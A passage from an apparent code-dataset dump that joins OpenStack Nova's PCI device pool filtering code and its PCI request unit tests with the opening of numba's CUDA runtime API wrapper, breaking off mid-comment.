dev_pool = self._create_pool_keys_from_dev(dev)
if dev_pool:
pool = self._find_pool(dev_pool)
if not pool:
raise exception.PciDevicePoolEmpty(
compute_node_id=dev.compute_node_id, address=dev.address)
pool['devices'].remove(dev)
self._decrease_pool_count(self.pools, pool)
def get_free_devs(self) -> ty.List['objects.PciDevice']:
free_devs: ty.List[objects.PciDevice] = []
for pool in self.pools:
free_devs.extend(pool['devices'])
return free_devs
def consume_requests(
self,
pci_requests: 'objects.InstancePCIRequests',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> ty.Optional[ty.List['objects.PciDevice']]:
alloc_devices: ty.List[objects.PciDevice] = []
for request in pci_requests:
count = request.count
pools = self._filter_pools(self.pools, request, numa_cells)
# Failed to allocate the required number of devices. Return the
# devices already allocated during previous iterations back to
# their pools
if not pools:
LOG.error("Failed to allocate PCI devices for instance. "
"Unassigning devices back to pools. "
"This should not happen, since the scheduler "
"should have accurate information, and allocation "
"during claims is controlled via a hold "
"on the compute node semaphore.")
for d in range(len(alloc_devices)):
self.add_device(alloc_devices.pop())
return None
for pool in pools:
if pool['count'] >= count:
num_alloc = count
else:
num_alloc = pool['count']
count -= num_alloc
pool['count'] -= num_alloc
for d in range(num_alloc):
pci_dev = pool['devices'].pop()
self._handle_device_dependents(pci_dev)
pci_dev.request_id = request.request_id
alloc_devices.append(pci_dev)
if count == 0:
break
return alloc_devices
def _handle_device_dependents(self, pci_dev: 'objects.PciDevice') -> None:
"""Remove device dependents or a parent from pools.
In case the device is a PF, all of it's dependent VFs should
be removed from pools count, if these are present.
When the device is a VF, or a VDPA device, it's parent PF
pool count should be decreased, unless it is no longer in a pool.
"""
if pci_dev.dev_type == fields.PciDeviceType.SRIOV_PF:
vfs_list = pci_dev.child_devices
if vfs_list:
free_devs = self.get_free_devs()
for vf in vfs_list:
# NOTE(gibi): do not try to remove a device that are
# already removed
if vf in free_devs:
self.remove_device(vf)
elif pci_dev.dev_type in (
fields.PciDeviceType.SRIOV_VF,
fields.PciDeviceType.VDPA,
):
try:
parent = pci_dev.parent_device
# Make sure not to decrease PF pool count if this parent has
# been already removed from pools
if parent in self.get_free_devs():
self.remove_device(parent)
except exception.PciDeviceNotFound:
return
def _filter_pools_for_spec(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools that don't match the request's device spec.
Exclude pools that do not match the specified ``vendor_id``,
``product_id`` and/or ``device_type`` field, or any of the other
arbitrary tags such as ``physical_network``, specified in the request.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
request_specs = request.spec
return [
pool for pool in pools
if utils.pci_device_prop_match(pool, request_specs)
]
def _filter_pools_for_numa_cells(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.List[Pool]:
"""Filter out pools with the wrong NUMA affinity, if required.
Exclude pools that do not have *suitable* PCI NUMA affinity.
``numa_policy`` determines what *suitable* means, being one of
PREFERRED (nice-to-have), LEGACY (must-have-if-available) and REQUIRED
(must-have). We iterate through the various policies in order of
strictness. This means that even if we only *prefer* PCI-NUMA affinity,
we will still attempt to provide it if possible.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells.
:returns: A list of pools that can, together, provide at least
``requested_count`` PCI devices with the level of NUMA affinity
required by ``numa_policy``, else all pools that can satisfy this
policy even if it's not enough.
"""
if not numa_cells:
return pools
# we default to the 'legacy' policy for...of course...legacy reasons
requested_policy = fields.PCINUMAAffinityPolicy.LEGACY
if 'numa_policy' in request:
requested_policy = request.numa_policy or requested_policy
requested_count = request.count
numa_cell_ids = [cell.id for cell in numa_cells]
# filter out pools which numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# we can't apply a less strict policy than the one requested, so we
# need to return if we've demanded a NUMA affinity of REQUIRED.
# However, NUMA affinity is a good thing. If we can get enough devices
# with the stricter policy then we will use them.
if requested_policy == fields.PCINUMAAffinityPolicy.REQUIRED or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# the SOCKET policy is a bit of a special case. It's less strict than
# REQUIRED (so REQUIRED will automatically fulfil SOCKET, at least
# with our assumption of never having multiple sockets per NUMA node),
# but not always more strict than LEGACY: a PCI device with no NUMA
# affinity will fulfil LEGACY but not SOCKET. If we have SOCKET,
# process it here and don't continue.
if requested_policy == fields.PCINUMAAffinityPolicy.SOCKET:
return self._filter_pools_for_socket_affinity(pools, numa_cells)
# some systems don't report NUMA node info for PCI devices, in which
# case None is reported in 'pci_device.numa_node'. The LEGACY policy
# allows us to use these devices so we include None in the list of
# suitable NUMA cells.
numa_cell_ids.append(None)
# filter out pools which numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# once again, we can't apply a less strict policy than the one
# requested, so we need to return if we've demanded a NUMA affinity of
# LEGACY. Similarly, we will also return if we have enough devices to
# satisfy this somewhat strict policy.
if requested_policy == fields.PCINUMAAffinityPolicy.LEGACY or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# if we've got here, we're using the PREFERRED policy and weren't able
# to provide anything with stricter affinity. Use whatever devices you
# can, folks.
return sorted(
pools, key=lambda pool: pool.get('numa_node') not in numa_cell_ids)
def _filter_pools_for_socket_affinity(
self,
pools: ty.List[Pool],
numa_cells: ty.List['objects.InstanceNUMACell'],
) -> ty.List[Pool]:
host_cells = self.numa_topology.cells
# bail early if we don't have socket information for all host_cells.
# This could happen if we're running on an weird older system with
# multiple sockets per NUMA node, which is a configuration that we
# explicitly chose not to support.
if any(cell.socket is None for cell in host_cells):
LOG.debug('No socket information in host NUMA cell(s).')
return []
# get a set of host sockets that the guest cells are in. Since guest
# cell IDs map to host cell IDs, we can just lookup the latter's
# socket.
socket_ids = set()
for guest_cell in numa_cells:
for host_cell in host_cells:
if guest_cell.id == host_cell.id:
socket_ids.add(host_cell.socket)
# now get a set of host NUMA nodes that are in the above sockets
allowed_numa_nodes = set()
for host_cell in host_cells:
if host_cell.socket in socket_ids:
allowed_numa_nodes.add(host_cell.id)
# filter out pools that are not in one of the correct host NUMA nodes.
return [
pool for pool in pools if any(
utils.pci_device_prop_match(pool, [{'numa_node': numa_node}])
for numa_node in allowed_numa_nodes
)
]
def _filter_pools_for_unrequested_pfs(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with PFs, unless these are required.
This is necessary in cases where PFs and VFs have the same product_id
and generally useful elsewhere.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.SRIOV_PF
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.SRIOV_PF
]
return pools
def _filter_pools_for_unrequested_vdpa_devices(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with VDPA devices, unless these are required.
This is necessary as vdpa devices require special handling and
should not be allocated to generic pci device requests.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.VDPA
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.VDPA
]
return pools
def _filter_pools_for_unrequested_remote_managed_devices(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with remote_managed devices, unless requested.
Remote-managed devices are not usable for legacy SR-IOV or hardware
offload scenarios and must be excluded from allocation.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(not strutils.bool_from_string(spec.get(PCI_REMOTE_MANAGED_TAG))
for spec in request.spec):
pools = [pool for pool in pools
if not strutils.bool_from_string(
pool.get(PCI_REMOTE_MANAGED_TAG))]
return pools
def _filter_pools(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.Optional[ty.List[Pool]]:
"""Determine if an individual PCI request can be met.
Filter pools, which are collections of devices with similar traits, to
identify those that can support the provided PCI request.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``request.numa_policy``.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACell objects.
:returns: A list of pools that can be used to support the request if
this is possible, else None.
"""
# NOTE(vladikr): This code may be open to race conditions.
# Two concurrent requests may succeed when called support_requests
# because this method does not remove related devices from the pools
# Firstly, let's exclude all devices that don't match our spec (e.g.
# they've got different PCI IDs or something)
before_count = sum([pool['count'] for pool in pools])
pools = self._filter_pools_for_spec(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) due to mismatched PCI attribute(s)',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# Next, let's exclude all devices that aren't on the correct NUMA node
# or socket, *assuming* we have devices and care about that, as
# determined by policy
before_count = after_count
pools = self._filter_pools_for_numa_cells(pools, request, numa_cells)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) as they are on the wrong NUMA node(s)',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# If we're not requesting PFs then we should not use these.
# Exclude them.
before_count = after_count
pools = self._filter_pools_for_unrequested_pfs(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) as they are PFs which we have not '
'requested',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# If we're not requesting VDPA devices then we should not use these
# either. Exclude them.
before_count = after_count
pools = self._filter_pools_for_unrequested_vdpa_devices(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) as they are VDPA devices which we have '
'not requested',
before_count - after_count
)
# If we're not requesting remote_managed devices then we should not
# use these either. Exclude them.
before_count = after_count
pools = self._filter_pools_for_unrequested_remote_managed_devices(
pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) as they are remote-managed devices which'
'we have not requested',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
return pools
def support_requests(
self,
requests: ty.List['objects.InstancePCIRequest'],
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> bool:
"""Determine if the PCI requests can be met.
Determine, based on a compute node's PCI stats, if an instance can be
scheduled on the node. **Support does not mean real allocation**.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``numa_policy``.
:param requests: A list of InstancePCIRequest object describing the
types, quantities and required NUMA affinities of devices we want.
:type requests: nova.objects.InstancePCIRequests
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells, or None.
:returns: Whether this compute node can satisfy the given request.
"""
# NOTE(yjiang5): this function has high possibility to fail,
# so no exception should be triggered for performance reason.
return all(
self._filter_pools(self.pools, r, numa_cells) for r in requests
)
def _apply_request(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> bool:
"""Apply an individual PCI request.
Apply a PCI request against a given set of PCI device pools, which are
collections of devices with similar traits.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``request.numa_policy``.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACell objects.
:returns: True if the request was applied against the provided pools
successfully, else False.
"""
# NOTE(vladikr): This code maybe open to race conditions.
# Two concurrent requests may succeed when called support_requests
# because this method does not remove related devices from the pools
filtered_pools = self._filter_pools(pools, request, numa_cells)
if not filtered_pools:
return False
count = request.count
for pool in filtered_pools:
count = self._decrease_pool_count(pools, pool, count)
if not count:
break
return True
def apply_requests(
self,
requests: ty.List['objects.InstancePCIRequest'],
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> None:
"""Apply PCI requests to the PCI stats.
This is used in multiple instance creation, when the scheduler has to
maintain how the resources are consumed by the instances.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``numa_policy``.
:param requests: A list of InstancePCIRequest object describing the
types, quantities and required NUMA affinities of devices we want.
:type requests: nova.objects.InstancePCIRequests
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells, or None.
:raises: exception.PciDeviceRequestFailed if this compute node cannot
satisfy the given request.
"""
if not all(
self._apply_request(self.pools, r, numa_cells) for r in requests
):
raise exception.PciDeviceRequestFailed(requests=requests)
def __iter__(self) -> ty.Iterator[Pool]:
pools: ty.List[Pool] = []
for pool in self.pools:
pool = copy.deepcopy(pool)
# 'devices' shouldn't be part of stats
if 'devices' in pool:
del pool['devices']
pools.append(pool)
return iter(pools)
def clear(self) -> None:
"""Clear all the stats maintained."""
self.pools = []
def __eq__(self, other: object) -> bool:
if not isinstance(other, PciDeviceStats):
return NotImplemented
return self.pools == other.pools
def to_device_pools_obj(self) -> 'objects.PciDevicePoolList':
"""Return the contents of the pools as a PciDevicePoolList object."""
stats = [x for x in self]
return pci_device_pool.from_pci_stats(stats)
def has_remote_managed_device_pools(self) -> bool:
"""Determine whether remote managed device pools are present on a host.
The check is pool-based, not free device-based and is NUMA cell
agnostic.
"""
dummy_req = objects.InstancePCIRequest(
count=0,
spec=[{'remote_managed': True}]
)
pools = self._filter_pools_for_spec(self.pools, dummy_req)
return bool(pools)
```
#### File: unit/pci/test_request.py
```python
import mock
from oslo_serialization import jsonutils
from oslo_utils.fixture import uuidsentinel
from nova import context
from nova import exception
from nova.network import model
from nova import objects
from nova.objects import fields
from nova.pci import request
from nova import test
from nova.tests.unit.api.openstack import fakes
_fake_alias1 = jsonutils.dumps({
"name": "QuickAssist",
"capability_type": "pci",
"product_id": "4443",
"vendor_id": "8086",
"device_type": "type-PCI",
"numa_policy": "legacy",
})
_fake_alias2 = jsonutils.dumps({
"name": "IntelNIC",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PF",
})
class PciRequestTestCase(test.NoDBTestCase):
@staticmethod
def _create_fake_inst_with_pci_devs(pci_req_list, pci_dev_list):
"""Create a fake Instance object with the provided InstancePciRequests
and PciDevices.
:param pci_req_list: a list of InstancePCIRequest objects.
:param pci_dev_list: a list of PciDevice objects, each element
associated (via request_id attribute)with a corresponding
element from pci_req_list.
:return: A fake Instance object associated with the provided
PciRequests and PciDevices.
"""
inst = objects.Instance()
inst.uuid = uuidsentinel.instance1
inst.pci_requests = objects.InstancePCIRequests(
requests=pci_req_list)
inst.pci_devices = objects.PciDeviceList(objects=pci_dev_list)
inst.host = 'fake-host'
inst.node = 'fake-node'
return inst
def setUp(self):
super(PciRequestTestCase, self).setUp()
self.context = context.RequestContext(fakes.FAKE_USER_ID,
fakes.FAKE_PROJECT_ID)
def test_get_alias_from_config_valid(self):
self.flags(alias=[_fake_alias1], group='pci')
result = request._get_alias_from_config()
expected_result = (
'legacy',
[{
"capability_type": "pci",
"product_id": "4443",
"vendor_id": "8086",
"dev_type": "type-PCI",
}])
self.assertEqual(expected_result, result['QuickAssist'])
def test_get_alias_from_config_valid_multispec(self):
_fake_alias = jsonutils.dumps({
"name": "QuickAssist",
"capability_type": "pci",
"product_id": "4444",
"vendor_id": "8086",
"device_type": "type-PCI",
})
self.flags(alias=[_fake_alias1, _fake_alias], group='pci')
result = request._get_alias_from_config()
expected_result = (
'legacy',
[{
"capability_type": "pci",
"product_id": "4443",
"vendor_id": "8086",
"dev_type": "type-PCI"
}, {
"capability_type": "pci",
"product_id": "4444",
"vendor_id": "8086",
"dev_type": "type-PCI"
}])
self.assertEqual(expected_result, result['QuickAssist'])
def _test_get_alias_from_config_invalid(self, alias):
self.flags(alias=[alias], group='pci')
self.assertRaises(
exception.PciInvalidAlias,
request._get_alias_from_config)
def test_get_alias_from_config_invalid_device_type(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"device_type": "N",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_device_type_vdpa(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"device_type": "vdpa",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_product_id(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"product_id": "g111",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_vendor_id(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"vendor_id": "0xg111",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_capability_type(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"capability_type": "usb",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_numa_policy(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"numa_policy": "derp",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_arbitrary_field(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"foo": "bar",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_valid_numa_policy(self):
for policy in fields.PCINUMAAffinityPolicy.ALL:
fake_alias = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PCI",
"numa_policy": policy,
})
self.flags(alias=[fake_alias], group='pci')
aliases = request._get_alias_from_config()
self.assertIsNotNone(aliases)
self.assertIn("xxx", aliases)
self.assertEqual(policy, aliases["xxx"][0])
def test_get_alias_from_config_conflicting_device_type(self):
"""Check behavior when device_type conflicts occur."""
fake_alias_a = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PF"
})
fake_alias_b = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PCI"
})
self.flags(alias=[fake_alias_a, fake_alias_b], group='pci')
self.assertRaises(
exception.PciInvalidAlias,
request._get_alias_from_config)
def test_get_alias_from_config_conflicting_numa_policy(self):
"""Check behavior when numa_policy conflicts occur."""
fake_alias_a = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"numa_policy": "required",
})
fake_alias_b = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"numa_policy": "legacy",
})
self.flags(alias=[fake_alias_a, fake_alias_b], group='pci')
self.assertRaises(
exception.PciInvalidAlias,
request._get_alias_from_config)
def _verify_result(self, expected, real):
exp_real = zip(expected, real)
for exp, real in exp_real:
self.assertEqual(exp['count'], real.count)
self.assertEqual(exp['alias_name'], real.alias_name)
self.assertEqual(exp['spec'], real.spec)
def test_translate_alias_to_requests(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
expect_request = [
{'count': 3,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '4443',
'dev_type': 'type-PCI',
'capability_type': 'pci'}],
'alias_name': 'QuickAssist'},
{'count': 1,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC'}, ]
requests = request._translate_alias_to_requests(
"QuickAssist : 3, IntelNIC: 1")
self.assertEqual(set([p.count for p in requests]), set([1, 3]))
self._verify_result(expect_request, requests)
def test_translate_alias_to_requests_invalid(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
self.assertRaises(exception.PciRequestAliasNotDefined,
request._translate_alias_to_requests,
"QuickAssistX : 3")
def test_translate_alias_to_requests_affinity_policy(self):
# _fake_alias1 requests the legacy policy and _fake_alias2
# has no numa_policy set so it will default to legacy.
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
# so to test that the flavor/image policy takes precedence
# set use the preferred policy.
policy = fields.PCINUMAAffinityPolicy.PREFERRED
expect_request = [
{'count': 3,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '4443',
'dev_type': 'type-PCI',
'capability_type': 'pci'}],
'alias_name': 'QuickAssist',
'numa_policy': policy
},
{'count': 1,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC',
'numa_policy': policy
}, ]
requests = request._translate_alias_to_requests(
"QuickAssist : 3, IntelNIC: 1", affinity_policy=policy)
self.assertEqual(set([p.count for p in requests]), set([1, 3]))
self._verify_result(expect_request, requests)
@mock.patch.object(objects.compute_node.ComputeNode,
'get_by_host_and_nodename')
def test_get_instance_pci_request_from_vif_invalid(
self,
cn_get_by_host_and_node):
# Basically make sure we raise an exception if an instance
# has an allocated PCI device without having the its corresponding
# PCIRequest object in instance.pci_requests
mock_inst_cn = mock.Mock()
mock_inst_cn.id = 1
cn_get_by_host_and_node.return_value = mock_inst_cn
# Create a fake instance with PCI request and allocated PCI devices
pci_dev1 = objects.PciDevice(request_id=uuidsentinel.pci_req_id1,
address='0000:04:00.0',
compute_node_id=1)
pci_req2 = objects.InstancePCIRequest(
request_id=uuidsentinel.pci_req_id2)
pci_dev2 = objects.PciDevice(request_id=uuidsentinel.pci_req_id2,
address='0000:05:00.0',
compute_node_id=1)
pci_request_list = [pci_req2]
pci_device_list = [pci_dev1, pci_dev2]
inst = PciRequestTestCase._create_fake_inst_with_pci_devs(
pci_request_list,
pci_device_list)
# Create a VIF with pci_dev1 that has no corresponding PCI request
pci_vif = model.VIF(vnic_type=model.VNIC_TYPE_DIRECT,
profile={'pci_slot': '0000:04:00.0'})
self.assertRaises(exception.PciRequestFromVIFNotFound,
request.get_instance_pci_request_from_vif,
self.context,
inst,
pci_vif)
@mock.patch.object(objects.compute_node.ComputeNode,
'get_by_host_and_nodename')
def test_get_instance_pci_request_from_vif(self, cn_get_by_host_and_node):
mock_inst_cn = mock.Mock()
mock_inst_cn.id = 1
cn_get_by_host_and_node.return_value = mock_inst_cn
# Create a fake instance with PCI request and allocated PCI devices
pci_req1 = objects.InstancePCIRequest(
request_id=uuidsentinel.pci_req_id1)
pci_dev1 = objects.PciDevice(request_id=uuidsentinel.pci_req_id1,
address='0000:04:00.0',
compute_node_id = 1)
pci_req2 = objects.InstancePCIRequest(
request_id=uuidsentinel.pci_req_id2)
pci_dev2 = objects.PciDevice(request_id=uuidsentinel.pci_req_id2,
address='0000:05:00.0',
compute_node_id=1)
pci_request_list = [pci_req1, pci_req2]
pci_device_list = [pci_dev1, pci_dev2]
inst = PciRequestTestCase._create_fake_inst_with_pci_devs(
pci_request_list,
pci_device_list)
# Create a vif with normal port and make sure no PCI request returned
normal_vif = model.VIF(vnic_type=model.VNIC_TYPE_NORMAL)
self.assertIsNone(request.get_instance_pci_request_from_vif(
self.context,
inst,
normal_vif))
# Create a vif with PCI address under profile, make sure the correct
# PCI request is returned
pci_vif = model.VIF(vnic_type=model.VNIC_TYPE_DIRECT,
profile={'pci_slot': '0000:05:00.0'})
self.assertEqual(uuidsentinel.pci_req_id2,
request.get_instance_pci_request_from_vif(
self.context,
inst,
pci_vif).request_id)
# Create a vif with PCI under profile which is not claimed
# for the instance, i.e no matching pci device in instance.pci_devices
nonclaimed_pci_vif = model.VIF(vnic_type=model.VNIC_TYPE_DIRECT,
profile={'pci_slot': '0000:08:00.0'})
self.assertIsNone(request.get_instance_pci_request_from_vif(
self.context,
inst,
nonclaimed_pci_vif))
# "Move" the instance to another compute node, make sure that no
# matching PCI request against the new compute.
mock_inst_cn.id = 2
self.assertIsNone(request.get_instance_pci_request_from_vif(
self.context,
inst,
pci_vif))
def test_get_pci_requests_from_flavor(self):
self.flags(alias=[_fake_alias1], group='pci')
expect_request = [
{
'count': 3,
'spec': [
{
'vendor_id': '8086',
'product_id': '4443',
'dev_type': "type-PCI",
'capability_type': 'pci',
}
],
'alias_name': 'QuickAssist'
},
]
flavor = {'extra_specs': {'pci_passthrough:alias': 'QuickAssist:3'}}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual(1, len(requests.requests))
self.assertEqual({3, }, {p.count for p in requests.requests})
self._verify_result(expect_request, requests.requests)
def test_get_pci_requests_from_flavor_multiple(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
expect_request = [
{'count': 3,
'spec': [{'vendor_id': '8086', 'product_id': '4443',
'dev_type': "type-PCI",
'capability_type': 'pci'}],
'alias_name': 'QuickAssist'},
{'count': 1,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC'}, ]
flavor = {'extra_specs': {"pci_passthrough:alias":
"QuickAssist:3, IntelNIC: 1"}}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual(2, len(requests.requests))
self.assertEqual({3, 1}, {p.count for p in requests.requests})
self._verify_result(expect_request, requests.requests)
def test_get_pci_requests_from_flavor_including_space(self):
_fake_alias4 = jsonutils.dumps({
"name": " Cirrus Logic ",
"capability_type": "pci",
"product_id": "0ff2",
"vendor_id": "10de",
"device_type": "type-PCI",
})
self.flags(alias=[_fake_alias2, _fake_alias4], group='pci')
expect_request = [
{'count': 4,
'spec': [{'vendor_id': '10de', 'product_id': '0ff2',
'dev_type': "type-PCI",
'capability_type': 'pci'}],
'alias_name': 'Cirrus Logic'},
{'count': 3,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC'}, ]
flavor = {'extra_specs': {"pci_passthrough:alias":
" Cirrus Logic : 4, IntelNIC: 3"}}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual(2, len(requests.requests))
self.assertEqual({3, 4}, {p.count for p in requests.requests})
self._verify_result(expect_request, requests.requests)
def test_get_pci_requests_from_flavor_no_extra_spec(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
flavor = {}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual([], requests.requests)
@mock.patch.object(
request, "_translate_alias_to_requests", return_value=[])
def test_get_pci_requests_from_flavor_affinity_policy(
self, mock_translate):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
flavor = {'extra_specs': {"pci_passthrough:alias":
"QuickAssist:3, IntelNIC: 1"}}
policy = fields.PCINUMAAffinityPolicy.PREFERRED
request.get_pci_requests_from_flavor(flavor, affinity_policy=policy)
mock_translate.assert_called_with(mock.ANY, affinity_policy=policy)
``` |
{
"source": "10088/numba",
"score": 2
} |
#### File: cuda/cudadrv/runtime.py
```python
import ctypes
import functools
import sys
from numba.core import config
from numba.cuda.cudadrv.driver import ERROR_MAP, make_logger
from numba.cuda.cudadrv.error import CudaSupportError, CudaRuntimeError
from numba.cuda.cudadrv.libs import open_cudalib
from numba.cuda.cudadrv.rtapi import API_PROTOTYPES
from numba.cuda.cudadrv import enums
class CudaRuntimeAPIError(CudaRuntimeError):
"""
Raised when there is an error accessing a C API from the CUDA Runtime.
"""
def __init__(self, code, msg):
self.code = code
self.msg = msg
super().__init__(code, msg)
def __str__(self):
return "[%s] %s" % (self.code, self.msg)
class Runtime:
"""
Runtime object that lazily binds runtime API functions.
"""
def __init__(self):
self.is_initialized = False
def _initialize(self):
# lazily initialize logger
global _logger
_logger = make_logger()
if config.DISABLE_CUDA:
msg = ("CUDA is disabled due to setting NUMBA_DISABLE_CUDA=1 "
"in the environment, or because CUDA is unsupported on "
"32-bit systems.")
raise CudaSupportError(msg)
self.lib = open_cudalib('cudart')
self.is_initialized = True
def __getattr__(self, fname):
# First request of a runtime API function
try:
proto = API_PROTOTYPES[fname]
except KeyError:
raise AttributeError(fname)
restype = proto[0]
argtypes = proto[1:]
if not self.is_initialized:
self._initialize()
# Find function in runtime library
libfn = self._find_api(fname)
libfn.restype = restype
libfn.argtypes = argtypes
safe_call = self._wrap_api_call(fname, libfn)
setattr(self, fname, safe_call)
return safe_call
def _wrap_api_call(self, fname, libfn):
@functools.wraps(libfn)
def safe_cuda_api_call(*args):
_logger.debug('call runtime api: %s', libfn.__name__)
retcode = libfn(*args)
self._check_error(fname, retcode)
return safe_cuda_api_call
def _check_error(self, fname, retcode):
if retcode != enums.CUDA_SUCCESS:
errname = ERROR_MAP.get(retcode, "cudaErrorUnknown")
msg = "Call to %s results in %s" % (fname, errname)
_logger.error(msg)
raise CudaRuntimeAPIError(retcode, msg)
def _find_api(self, fname):
try:
return getattr(self.lib, fname)
except AttributeError:
pass
# Not found.
# Delay missing function error to use
